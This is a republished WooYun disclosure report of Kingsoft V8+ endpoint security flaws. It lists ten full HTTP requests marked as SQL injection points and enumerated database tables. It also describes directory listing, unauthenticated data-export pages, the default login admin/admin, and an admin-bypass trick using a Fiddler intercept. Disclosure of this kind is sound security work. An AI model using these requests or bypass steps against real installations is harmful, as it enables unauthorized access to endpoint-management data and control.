金山V8+终端安全系统10处SQL注入(需登录)+默认配置不当+后台权限绕过等漏洞集合 admin 139701文章 114评论 2017年4月22日00:17:05评论618 views字数 232阅读0分46秒阅读模式 摘要2016-03-01: 细节已通知厂商并且等待厂商处理中 2016-03-01: 厂商已经确认,细节仅向厂商公开 2016-03-04: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-04-25: 细节向核心白帽子及相关领域专家公开 2016-05-05: 细节向普通白帽子公开 2016-05-15: 细节向实习白帽子公开 2016-05-30: 细节向公众公开 漏洞概要 关注数(17) 关注此漏洞 缺陷编号: WooYun-2016-179804 漏洞标题: 金山V8+终端安全系统10处SQL注入(需登录)+默认配置不当+后台权限绕过等漏洞集合 相关厂商: 金山网络 漏洞作者: niliu 提交时间: 2016-03-01 18:54 公开时间: 2016-05-30 20:10 漏洞类型: SQL注射漏洞 危害等级: 高 自评Rank: 20 漏洞状态: 厂商已经确认 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: sql注入 3人收藏 漏洞详情 披露状态: 2016-03-01: 细节已通知厂商并且等待厂商处理中 2016-03-01: 厂商已经确认,细节仅向厂商公开 2016-03-04: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-04-25: 细节向核心白帽子及相关领域专家公开 2016-05-05: 细节向普通白帽子公开 2016-05-15: 细节向实习白帽子公开 2016-05-30: 细节向公众公开 简要描述: 金山V8+终端安全系统10处SQL注入+默认配置不当+后台权限绕过 详细说明: 看下产品介绍先 SQL注入比较多,10处如下: code 区域 1. POST /active_defense/scan/get_group_list_cmd.kptl HTTP/1.1 Host: **.**.**.**:6868 Content-Length: 149 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/active_defense/scan/main.php?li=4&a=7 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}} 2. POST /report/log/get_log_cmd.kptl HTTP/1.1 Host: **.**.**.**:6868 Content-Length: 408 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"20","log_request_page":"2","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}} 3. POST /report/report/ajax.kptl HTTP/1.1 Host: **.**.**.**:6868 Content-Length: 205 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/report/report/main.php?li=5&a=14 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_report_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","period_type":"-1","count_page":"2","request_page":"1","VHierarchyID":"ADMIN"}} 4. POST /report/log/get_log_cmd.kptl HTTP/1.1 Host: **.**.**.**:6868 Content-Length: 409 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"100","log_request_page":"1","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}} 5. POST /softmanagement/distribute/get_group_list_cmd.kptl HTTP/1.1 Host: **.**.**.**:6868 Content-Length: 149 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/softmanagement/distribute/main.php?li=3&a=6 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}} 6. POST /boundary_manage/ajax.kptl HTTP/1.1 Host: **.**.**.**:6868 Content-Length: 372 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%221%22%2C%22stype%22%3A%221%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A1%7D Referer: **.**.**.**:6868/boundary_manage/boundary_file.php?li=2&a=2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_file_name_details_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","groupids":["1"],"boundary_type":"5","time_type":"4","start_time":"0","end_time":"0","file_md5":"72C84AE241A44567B31CA2B4FB7557C9","sort_type":"download_time","sort_order":"desc","page_count":"10","current_page":"1"}} 7. POST /client_manage/group/get_group_list_cmd.kptl HTTP/1.1 Host: **.**.**.**:6868 Content-Length: 149 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%226%22%2C%22rtype%22%3A%225%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A2%7D; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/client_manage/group/main.php?li=1&a=1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}} 8. POST /settings/system/get_group_list_cmd.kptl HTTP/1.1 Origin: **.**.**.**:6868 Content-Length: 149 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/settings/system/groups.php?li=6&a=15 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}} 9. POST /softmanagement/forbidden/get_group_list_cmd.kptl HTTP/1.1 Origin: **.**.**.**:6868 Content-Length: 149 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}} 10. POST /softmanagement/forbidden/get_classify_list_info_cmd.kptl HTTP/1.1 Origin: **.**.**.**:6868 Content-Length: 288 Accept-Language: zh-CN,zh;q=0.8 Userhash: cond0r Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Host: **.**.**.**:6868 X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1 Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate {"get_classify_list_info_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","classify_id":"-1","group_id":"ADMIN","key_words":"3","count_page":"20","current_page":"1","sort_type":"state","sort_order":"desc"}} 漏洞证明: code 区域 Database: SQLite_masterdb [69 tables] +-----------------------------+ | ArpClientMacIp | | ArpInfo | | ArpInfo_History | | ArpOptions | | BDLogManagerOptions | | BoundaryOptions | | ClientDelete | | ClientInfoCollect | | ClientScanFinishInfo | | ClientStaInfo | | ClientUpdateOptions | | ClientVersionInfo | | ClientVirusCollect | | DefaultPopedom | | DomainGroupInfo | | GroupInfo | | HostInfo | | HostSoftLeakScanInfo | | HostSysLeakScanInfo | | IPFilter | | KChildSysCenterIPInfo | | KClearOpenOptions | | KFilePushInfo | | KForbidSoftInfo | | KGroupIP | | KLncncCompanyInfo | | KReport | | KSimpleSoftInfo | | KSoftUninstallStrategy | | KSoftWareMgrOptions | | KUninstallSoftInfo | | KVDeviceGroupIP | | KVDeviceGroupInfo | | KVDipatcherPlanTask | | KVMEngineOptions | | LeakRepairStategy | | LeakScanRepairCmd | | MailMonOptions | | MailMonVirusInfo | | NetWorkManagerInfo | | ReportIndex | | ReportOnlineIPSet | | ReportStrategy | | RootWhiteListInfo | | SCMessageLog | | SCOperLog | | SCOperation | | SCUser | | ScanConfigOptions | | ScanOptions | | StrongManagerOptions | | SysMonitorOpt | | SystemCenterTree | | TaskOptions | | UDiskAgentOptions | | UDiskOptions | | USBOptions | | UninstallKavClientIPs | | UserPopedom | | VHierarchyBaseVirusDealInfo | | VHierarchyInfo | | VHierarchySetupInfo | | VirusCountInfo | | VirusInfo | | ViuusInfoCollect | | WatchOptions | | _GroupInfo_old_20131010 | | sqlite_sequence | | webconfig | +-----------------------------+ 默认配置不当,系统默认开启了目录遍历 举几个例子 code 区域 http://**.**.**.**/boundary_manage/ **.**.**.**:6868/active_defense/ **.**.**.**:6868/report/ http://**.**.**.**/active_defense/ **.**.**.**:6868/settings/ 还有很多不列举了,找了几个案例证明下 然后发现许多页面都可以未授权访问,由于页面比较多没有一一尝试,厂商统一限制下吧,文件名中有excel字样的都是直接下载对应的数据的。 列举几处 code 区域 **.**.**.**:6868/active_defense/scan/task.php **.**.**.**:6868/active_defense/scan/export.php **.**.**.**:6868/report/log/excel2.php **.**.**.**:6868/report/log/analyse.php **.**.**.**:6868/report/log/date_select.php **.**.**.**:6868/report/log/excel.php **.**.**.**:6868/report/general/ksafecount.php http://**.**.**.**/active_defense/scan/task.php http://**.**.**.**/boundary_manage/boundary_file_report.php http://**.**.**.**/active_defense/scan/task.php 顺便提一下后台存在默认口令admin/admin 以上的未授权访问发现看到的数据比较有限,于是又测试了一番,发现后台完全可以绕过。。。 系统的所有页面访问时会判断是否登录,请求如下: code 区域 GET /login.php HTTP/1.1 Host: **.**.**.**:6868 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Referer: **.**.**.**:6868/settings/system/groups.php?li=0&a=0 Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8 这个请求会跳转到登录页,那么只要在fiddler中,输入拦截该url即可绕过。 可以查看系统配置,密码,还可以修改公告并且公告处存在XSS,上传热门工具。。 看下效果 修复方案: 过滤+权限 版权声明:转载请注明来源 niliu@乌云 漏洞回应 厂商回应: 危害等级:中 漏洞Rank:8 确认时间:2016-03-01 20:06 厂商回复: 感谢对金山安全关注,已反馈给业务跟进修复,谢谢提交 最新状态: 暂无 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评价 2016-03-01 21:05 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗,任何自称HackBrai...) 1 前排膜拜niliu大师傅 1# 回复此人 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/40776.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗,任何自称HackBrai...)
评论